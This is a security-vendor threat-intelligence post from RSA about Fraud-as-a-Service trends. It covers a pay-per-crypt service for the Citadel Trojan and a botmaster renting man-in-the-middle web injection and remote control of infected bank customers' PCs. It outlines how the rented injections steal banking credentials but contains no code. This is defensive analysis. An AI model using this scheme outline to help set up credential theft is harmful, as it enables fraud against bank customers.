By Limor S Kessem, Cybercrime and Online Fraud Communications Specialist, RSA
Discussion and buzz about the burgeoning Fraud-as-a-Service (FaaS) trend in the cybercrime economy is as constant and as progressive as it gets. New FaaS offerings are only limited to the imagination of the dubious actors who offer them, and as such, are often creative and interesting in the ways by which they can make perpetrating fraud easier and more accessible to a growing number of criminals.
In some of the most recent FaaS offerings RSA noticed, it is interesting to see the Citadel Trojan developers’ team instruct “Crypters” to charge botmasters for their encryption services each time they provide them with a ‘crypt’ for their Citadel variant. This is a “pay-per-crypt” service, made accessible by a malware developing team that built a CRM system for their crimeware customers.
Another interesting offer put a twist on an old FaaS service – Internet traffic, with the added punch of cybercrime. Here, RSA’s FraudAction Research Lab analysts observed an interesting offering, “Man-in-the-Middle for Hire”.
This interesting offer came from a Russian-speaking cybercriminal, peddling his services to operate as the Man-in-the Middle for wire-fraud schemes. What would normally be part of a botmaster’s daily work, within the context of Trojan-assisted fraudulent transactions, is offered as an outsourced service to those interested in bypassing the entire process of building and upkeep of a botnet. This service would afford fraudsters direct access to victims without having to set up any of the infrastructure – via their very own Man-in-the-Middle.
The vendor is a botmaster himself, using a known banking Trojan that has a CAPTCHA-breaking module and links to exploit kits and attacks via legitimate websites (particularly Facebook and other social networks). Apparently, the vendor’s botnet is large and diverse enough that he can monetize it by renting his infected bots to the fraudsters who would actually commit the crime.
How will this work? In the fraudster’s words: “I enter in the middle of the connection and add a code with frame to the target page”. What does that actually mean?
- The vendor operates a botnet in which different bots (infected machines) are located in different countries and belong to customers of different banks.
- A fraudster-customer contacts the vendor and asks to forward a specific injection to the infected bots in a given country or to the customers of a specific bank.
- The vendor, who controls the botnet and bots’ browsers through the Trojan, can inject the fraudster-customer’s script into the victim’s banking session and have the stolen credentials go directly to that fraudster.
- Since the vendor also provides a remote control component, he can allow the buyer to take control over the infected PC and attempt session hijacking or other fraud scenarios.
The potential benefits of this service for less sophisticated fraudsters is a complete shortcut to the targeted theft of credentials and a way to attempt performing fraudulent transactions on Trojan-infected machines – without ever owning a Trojan or operating a botnet.
The potential drawbacks are the limited exclusivity of the bots, especially when it comes to the larger banks, but could be lucrative to fraudsters who wish to target credit unions or regional financial institutions that are in less demand or are less known.
This type of ‘service’ is part of the continuing trend of Fraud-as-a-Service supply chain in the black market where tech-savvy operators offer their help and resources to the actual thieves who will attempt to defraud accounts and cash them out.
Fortunately for security professionals, the mitigation methods for this MiTM attack are not affected since the fraudster is not offering a new attack method but rather creating a short-cut for those who plan to attempt accessing victim PCs. Similar results can be obtained otherwise by purchasing RDP access, which fraudsters have been doing for years; this offering tops that with custom injections and a live assistant.
Another side to this service offer is that the fraudster himself has to be available in real time to those demanding his assistance – unlike MITB and automated scripts, hands-on fraud schemes are time-consuming and can only target one victim at a time.
